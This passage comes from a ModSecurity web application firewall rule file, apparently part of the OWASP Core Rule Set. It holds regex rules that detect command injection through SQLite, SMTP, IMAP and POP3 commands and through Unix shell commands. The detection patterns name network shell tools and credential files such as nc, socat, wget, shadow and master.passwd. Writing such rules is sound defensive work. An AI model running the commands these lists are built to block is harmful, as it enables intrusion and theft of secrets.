;[\s\v]*\.[\s\v]*[\"']?(?:a(?:rchive|uth)|b(?:a(?:ckup|il)|inary)|c(?:d|h(?:anges|eck)|lone|onnection)|d(?:atabases|b(?:config|info)|ump)|e(?:cho|qp|x(?:cel|it|p(?:ert|lain)))|f(?:ilectrl|ullschema)|he(?:aders|lp)|i(?:mpo(?:rt|ster)|ndexes|otrace)|l(?:i(?:mi|n)t|o(?:ad|g))|(?:mod|n(?:onc|ullvalu)|unmodul)e|o(?:nce|pen|utput)|p(?:arameter|r(?:int|o(?:gress|mpt)))|quit|re(?:ad|cover|store)|s(?:ave|c(?:anstats|hema)|e(?:lftest|parator|ssion)|h(?:a3sum|ell|ow)?|tats|ystem)|t(?:ables|estc(?:ase|trl)|ime(?:out|r)|race)|vfs(?:info|list|name)|width)" \ + "id:932210,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,t:compressWhitespace,\ + msg:'Remote Command Execution: SQLite System Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# -=[ SMTP/IMAP/POP3 Command Execution ]=- +# +# Rationale +# ========= +# +# The rules for email command execution are based on the RFCs for each protocol. +# Some of the commands have optional and/or additional parameters, so we tried to be +# precise to avoid as many FP in PL2 rules. +# For those commands that resemble common English words, and may pose a higher risk of false positives, +# they have been split off to a sibling rule in PL3. + +# =[ SMTP Command Execution ]= +# +# This rule prevents execution of SMTP related system commands. +# +# List of SMTP commands: from rfc 5321 (https://www.rfc-editor.org/rfc/rfc5321) +# +# Regular expression generated from regex-assembly/932300.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932300 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:(?i:E)(?:HLO [\--\.A-Za-z\x17f\x212a]{1,255}|XPN .{1,64})|HELO [\--\.A-Za-z\x17f\x212a]{1,255}|MAIL FROM:<.{1,64}(?i:@).{1,255}(?i:>)|(?i:R)(?:CPT TO:(?:(?i:<).{1,64}(?i:@).{1,255}(?i:>)|(?i: ))?(?i:<).{1,64}(?i:>)|SET\b)|VRFY .{1,64}(?: <.{1,64}(?i:@).{1,255}(?i:>)|(?i:@).{1,255})|AUTH [\-0-9A-Z_a-z\x17f\x212a]{1,20}(?i: )(?:(?:[\+/-9A-Z_a-z\x17f\x212a]{4})*(?:[\+/-9A-Z_a-z\x17f\x212a]{2}(?i:=)|[\+/-9A-Z_a-z\x17f\x212a]{3}))?(?i:=)|STARTTLS\b|NOOP\b(?:(?i: ).{1,255})?)" \ + "id:932300,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: SMTP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# =[ IMAP Command Execution ]= +# +# This rule prevents execution of IMAP4 related system commands. +# +# List of IMAP4 commands: from rfc 3501 (https://datatracker.ietf.org/doc/html/rfc3501#section-9) +# +# Note: Mailbox International Naming Convention uses UTF-7, so it was left out explicitly. +# +# Regular expression generated from regex-assembly/932310.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932310 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n[0-9A-Z_a-z]{1,50}\b (?:A(?:PPEND (?:[\"-#%-&\*\--9A-Z\x5c_a-z]+)?(?: \([ \x5ca-z]+\))?(?: \"?[0-9]{1,2}-[0-9A-Z_a-z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [\+\-][0-9]{4}\"?)? \{[0-9]{1,20}\+?\}|UTHENTICATE [\-0-9_a-z]{1,20}\r\n)|L(?:SUB (?:[\"-#\*\.-9A-Z_a-z~]+)? (?:[\"%-&\*\.-9A-Z\x5c_a-z]+)?|ISTRIGHTS (?:[\"%-&\*\--9A-Z\x5c_a-z]+)?)|S(?:TATUS (?:[\"%-&\*\--9A-Z\x5c_a-z]+)? \((?:U(?:NSEEN|IDNEXT)|MESSAGES|UIDVALIDITY|RECENT| )+\)|ETACL (?:[\"%-&\*\--9A-Z\x5c_a-z]+)? [\+\-][ac-eik-lpr-tw-x]+?)|UID (?:COPY|FETCH|STORE) (?:[\*,0-:]+)?|(?:(?:DELETE|GET)ACL|MYRIGHTS) (?:[\"%-&\*\--9A-Z\x5c_a-z]+)?)" \ + "id:932310,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: IMAP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# =[ POP3 Command Execution ]= +# +# This rule prevents execution of POP3 related system commands. +# +# List of POP3 commands: +# - from rfc 1939 (https://www.rfc-editor.org/rfc/rfc1939#appendix-B) +# - extensions from rfc 2449 (https://www.rfc-editor.org/rfc/rfc2449) +# +# These commands all have some kind of parameter that makes them a good PL2 target. +# +# Regular expression generated from regex-assembly/932320.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932320 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n.*?\b(?:(?:LIST|TOP [0-9]+)(?: [0-9]+)?|U(?:SER .+?|IDL(?: [0-9]+)?)|PASS .+?|(?:RETR|DELE) [0-9]+?|A(?:POP [0-9A-Z_a-z]+ [0-9a-f]{32}|UTH [\-0-9A-Z_]{1,20} (?:(?:[\+/-9A-Z_a-z]{4})*(?:[\+/-9A-Z_a-z]{2}=|[\+/-9A-Z_a-z]{3}))?=))" \ + "id:932320,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: POP3 Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# [ Unix command injection ] +# +# This is a stricter sibling of rules 932230, 932235, 932250, 932260. +# This stricter sibling detects Unix RCE with and without prefix and words of any length. +# It uses the same regex. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932236.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932236 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*|(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*)[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine))[\s\v&\)<>\|]|pt(?:[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h?[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dd(?:group|user)|getty|nsible-playbook|xel)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|an|io|ulimit)|s(?:h|plit|vtool)|u(?:(?:t|rl)[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:-update)?|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|inks|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\v&\)<>\|]|shd)|ython[^\s\v])|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:arch|env|facl[\s\v&\)<>\|]|sid)?|ndmail)|(?:g|ash|nap)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v&\)<>\|]|datectl))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\v&\)<>\|]|diff)|ew[\s\v&\)<>\|]|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:3m|c|a(?:ll|tch)[\s\v&\)<>\|]|get|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))" \ + "id:932236,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection (command without evasion)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# This is a sibling of rule 932236. +# This sibling detects Unix RCE in request headers Referer and User-Agent. +# It uses the same regex but excludes known user-agents to avoid false positives. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# +# Regular expression generated from regex-assembly/932239.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932239 +# +SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*|(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*)[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine))[\s\v&\)<>\|]|pt(?:[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h?[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dd(?:group|user)|getty|nsible-playbook|xel)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|io|ulimit)|s(?:h|plit|vtool)|u(?:t[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:-update)?|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\v&\)<>\|]|shd)|ython[2-3])|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>